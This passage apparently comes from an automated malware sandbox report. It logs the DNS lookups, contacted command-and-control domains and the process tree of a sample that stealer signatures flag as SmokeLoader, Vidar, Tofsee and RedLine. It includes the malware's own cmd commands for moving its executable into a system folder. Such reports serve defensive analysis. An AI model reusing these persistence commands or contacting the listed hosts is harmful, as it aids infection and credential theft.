                                                                                                                        Jan 14, 2022 19:10:41.106853962 CET8.8.8.8192.168.2.50x490eNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.106853962 CET8.8.8.8192.168.2.50x490eNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.987297058 CET8.8.8.8192.168.2.50x6a1eNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.987297058 CET8.8.8.8192.168.2.50x6a1eNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.987297058 CET8.8.8.8192.168.2.50x6a1eNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.987297058 CET8.8.8.8192.168.2.50x6a1eNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:41.987297058 CET8.8.8.8192.168.2.50x6a1eNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:44.763099909 CET8.8.8.8192.168.2.50x55ccNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:44.788398981 CET8.8.8.8192.168.2.50x247bNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:44.996448040 CET8.8.8.8192.168.2.50xce19No error (0)ipwhois.app136.243.172.101A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.672281027 CET8.8.8.8192.168.2.50xb7cdNo error (0)c9d0e790b353537889bd47a364f5acff43c11f248.xyz185.112.83.97A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.861773014 CET8.8.8.8192.168.2.50xbecaNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.861773014 CET8.8.8.8192.168.2.50xbecaNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.861773014 CET8.8.8.8192.168.2.50xbecaNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.861773014 CET8.8.8.8192.168.2.50xbecaNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:45.861773014 CET8.8.8.8192.168.2.50xbecaNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:47.343697071 CET8.8.8.8192.168.2.50x2e44No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:48.189995050 CET8.8.8.8192.168.2.50xa86aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:10:57.902101040 CET8.8.8.8192.168.2.50x71c1No error (0)dl.uploadgram.me176.9.247.226A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.223313093 CET8.8.8.8192.168.2.50xc8faNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.223313093 CET8.8.8.8192.168.2.50xc8faNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.223313093 CET8.8.8.8192.168.2.50xc8faNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)
                                                                                                                        Jan 14, 2022 19:11:01.242662907 CET8.8.8.8192.168.2.50xd0a2No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • sasldotps.net
                                                                                                                          • host-data-coin-11.com
                                                                                                                        • hvxghwlm.org
                                                                                                                        • gvuhy.com
                                                                                                                        • xcewx.net
                                                                                                                        • fuylvs.net
                                                                                                                        • ejshmyhdg.net
                                                                                                                        • fxdrjy.net
                                                                                                                        • pmdsi.net
                                                                                                                        • data-host-coin-8.com
                                                                                                                        • jvggxpunvp.net
                                                                                                                        • utujjcpga.com
                                                                                                                        • anaxqk.org
                                                                                                                        • aeoceljuvu.org
                                                                                                                        • privacy-tools-for-you-780.com
                                                                                                                        • tavpv.org
                                                                                                                        • ylklohfb.net
                                                                                                                        • unicupload.top
                                                                                                                        • snjxprkrs.net
                                                                                                                        • ognsyxbqt.net
                                                                                                                        • mqsidiop.net
                                                                                                                        • ffjbt.com
                                                                                                                        • xhmgc.org
                                                                                                                        • dlrkn.org
                                                                                                                        • hqphi.org
                                                                                                                        • hrbkqnyvuq.org
                                                                                                                        • 185.7.214.171:8080
                                                                                                                        • oanyhf.net
                                                                                                                        • ebkix.org
                                                                                                                        • kglcf.net
                                                                                                                        • ralhhxo.com
                                                                                                                        • ucqxo.com
                                                                                                                        • rvrxkhapq.org
                                                                                                                        • tmefv.org
                                                                                                                        • ublgjca.net
                                                                                                                        • uauswjxvxi.com
                                                                                                                        • ihlanbec.com
                                                                                                                        • ocvhk.net
                                                                                                                        • bunksfs.com
                                                                                                                        • bhqyvtr.org
                                                                                                                        • vvcoavsyoi.org
                                                                                                                        • mgspnorl.com
                                                                                                                        • jlttjsjsn.net
                                                                                                                        • lwmkqmxs.net
                                                                                                                        • wodlytuu.org
                                                                                                                        • opwshtlv.com
                                                                                                                        • iofaey.org
                                                                                                                        • ndvhcbnqxy.net
                                                                                                                        • slwqa.org
                                                                                                                        • mudbgksxf.com
                                                                                                                        • ltpsu.com
                                                                                                                        • lkdybspw.org
                                                                                                                        • tumar.com
                                                                                                                        • dxlbaxnq.com
                                                                                                                        • 81.163.30.181
                                                                                                                        • vmrsokyf.net
                                                                                                                        • kuhyti.org
                                                                                                                        • jhryuyevsi.com
                                                                                                                        • tsjnpmoxk.net
                                                                                                                        • dhgvgbi.net
                                                                                                                        • sthgmss.net
                                                                                                                        • lqucepm.org
                                                                                                                        • drivqge.com
                                                                                                                        • srpcpdlmu.net
                                                                                                                        • sbdfkwshp.net
                                                                                                                        • getygnekfa.net
                                                                                                                        • svqaek.com
                                                                                                                        • vcddpnrql.org
                                                                                                                        • lchxcgbqi.org
                                                                                                                        • ksxvhtvig.net
                                                                                                                        • nxrloqgt.org
                                                                                                                        • aeymga.org
                                                                                                                        • duekablkqo.com
                                                                                                                        • foilygkb.org
                                                                                                                        • babqykwmy.org
                                                                                                                        • ygspe.com
                                                                                                                        • sytacviqe.org

                                                                                                                        Code Manipulations

                                                                                                                        Statistics

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        Analysis Process: GNXG5XLBEH.exe PID: 3224 Parent PID: 5108

                                                                                                                        General

                                                                                                                        Start time:19:08:25
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\Desktop\GNXG5XLBEH.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\GNXG5XLBEH.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:321536 bytes
                                                                                                                        MD5 hash:6F48E0E76C5DFB3FC3AA45311FA6D0EF
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low

                                                                                                                        Analysis Process: GNXG5XLBEH.exe PID: 6268 Parent PID: 3224

                                                                                                                        General

                                                                                                                        Start time:19:08:26
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\Desktop\GNXG5XLBEH.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\GNXG5XLBEH.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:321536 bytes
                                                                                                                        MD5 hash:6F48E0E76C5DFB3FC3AA45311FA6D0EF
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.303363186.0000000000470000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.303673269.0000000002091000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low

                                                                                                                        Analysis Process: explorer.exe PID: 3472 Parent PID: 6268

                                                                                                                        General

                                                                                                                        Start time:19:08:33
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                        Imagebase:0x7ff693d90000
                                                                                                                        File size:3933184 bytes
                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000000.288599943.00000000030E1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: svchost.exe PID: 6632 Parent PID: 556

                                                                                                                        General

                                                                                                                        Start time:19:08:35
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                        File size:51288 bytes
                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: svchost.exe PID: 6912 Parent PID: 556

                                                                                                                        General

                                                                                                                        Start time:19:08:43
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                        File size:51288 bytes
                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: svchost.exe PID: 6952 Parent PID: 556

                                                                                                                        General

                                                                                                                        Start time:19:08:45
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                        File size:51288 bytes
                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: svchost.exe PID: 7024 Parent PID: 556

                                                                                                                        General

                                                                                                                        Start time:19:08:46
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                        File size:51288 bytes
                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: svchost.exe PID: 7088 Parent PID: 556

                                                                                                                        General

                                                                                                                        Start time:19:08:46
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                        File size:51288 bytes
                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: SgrmBroker.exe PID: 7156 Parent PID: 556

                                                                                                                        General

                                                                                                                        Start time:19:08:47
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                        Imagebase:0x7ff64ff60000
                                                                                                                        File size:163336 bytes
                                                                                                                        MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: svchost.exe PID: 5604 Parent PID: 556

                                                                                                                        General

                                                                                                                        Start time:19:08:47
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                        File size:51288 bytes
                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: svchost.exe PID: 6424 Parent PID: 556

                                                                                                                        General

                                                                                                                        Start time:19:08:57
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                        File size:51288 bytes
                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: ttfssdi PID: 4512 Parent PID: 904

                                                                                                                        General

                                                                                                                        Start time:19:09:09
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Roaming\ttfssdi
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\ttfssdi
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:321536 bytes
                                                                                                                        MD5 hash:6F48E0E76C5DFB3FC3AA45311FA6D0EF
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                        Analysis Process: ttfssdi PID: 1284 Parent PID: 4512

                                                                                                                        General

                                                                                                                        Start time:19:09:11
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Roaming\ttfssdi
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\ttfssdi
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:321536 bytes
                                                                                                                        MD5 hash:6F48E0E76C5DFB3FC3AA45311FA6D0EF
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.354285300.0000000000570000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.354370443.00000000006A1000.00000004.00020000.sdmp, Author: Joe Security

                                                                                                                        Analysis Process: svchost.exe PID: 6600 Parent PID: 556

                                                                                                                        General

                                                                                                                        Start time:19:09:14
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                        File size:51288 bytes
                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: 5BBC.exe PID: 6604 Parent PID: 3472

                                                                                                                        General

                                                                                                                        Start time:19:09:14
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\5BBC.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\5BBC.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:301056 bytes
                                                                                                                        MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                        • Detection: 46%, Metadefender, Browse
                                                                                                                        • Detection: 77%, ReversingLabs

                                                                                                                        Analysis Process: svchost.exe PID: 1064 Parent PID: 556

                                                                                                                        General

                                                                                                                        Start time:19:09:18
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                        File size:51288 bytes
                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: 6B9B.exe PID: 6156 Parent PID: 3472

                                                                                                                        General

                                                                                                                        Start time:19:09:19
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\6B9B.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\6B9B.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:322048 bytes
                                                                                                                        MD5 hash:039CCF44EF7B55AEB4D22D211D17774E
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                        Analysis Process: WerFault.exe PID: 6204 Parent PID: 1064

                                                                                                                        General

                                                                                                                        Start time:19:09:19
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6604 -ip 6604
                                                                                                                        Imagebase:0x140000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: 6B9B.exe PID: 6568 Parent PID: 6156

                                                                                                                        General

                                                                                                                        Start time:19:09:21
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\6B9B.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\6B9B.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:322048 bytes
                                                                                                                        MD5 hash:039CCF44EF7B55AEB4D22D211D17774E
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.375596550.0000000000680000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.375811349.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security

                                                                                                                        Analysis Process: WerFault.exe PID: 3896 Parent PID: 6604

                                                                                                                        General

                                                                                                                        Start time:19:09:22
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 520
                                                                                                                        Imagebase:0x140000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: 6BA5.exe PID: 1412 Parent PID: 3472

                                                                                                                        General

                                                                                                                        Start time:19:09:23
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\6BA5.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\6BA5.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:324608 bytes
                                                                                                                        MD5 hash:7E58C9178CBD9D56DB805F034EC795CB
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                        Analysis Process: BackgroundTransferHost.exe PID: 240 Parent PID: 792

                                                                                                                        General

                                                                                                                        Start time:19:09:23
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                        Imagebase:0x7ff7505d0000
                                                                                                                        File size:36864 bytes
                                                                                                                        MD5 hash:02BA81746B929ECC9DB6665589B68335
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: 77CC.exe PID: 5196 Parent PID: 3472

                                                                                                                        General

                                                                                                                        Start time:19:09:26
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\77CC.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\77CC.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:321024 bytes
                                                                                                                        MD5 hash:D8DF1D21042865E2220B0D688BAE6DC4
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001E.00000002.396801518.0000000002170000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001E.00000002.395583768.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001E.00000003.371626952.0000000002190000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                        Analysis Process: 8058.exe PID: 5500 Parent PID: 3472

                                                                                                                        General

                                                                                                                        Start time:19:09:28
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\8058.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\8058.exe
                                                                                                                        Imagebase:0xd00000
                                                                                                                        File size:537088 bytes
                                                                                                                        MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.423233100.0000000004011000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Avira
                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                        Analysis Process: cmd.exe PID: 5716 Parent PID: 5196

                                                                                                                        General

                                                                                                                        Start time:19:09:31
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ceaplexz\
                                                                                                                        Imagebase:0x150000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: conhost.exe PID: 5720 Parent PID: 5716

                                                                                                                        General

                                                                                                                        Start time:19:09:32
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: cmd.exe PID: 6480 Parent PID: 5196

                                                                                                                        General

                                                                                                                        Start time:19:09:32
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\
                                                                                                                        Imagebase:0x150000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: conhost.exe PID: 6436 Parent PID: 6480

                                                                                                                        General

                                                                                                                        Start time:19:09:33
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Analysis Process: sc.exe PID: 5984 Parent PID: 5196

                                                                                                                        General

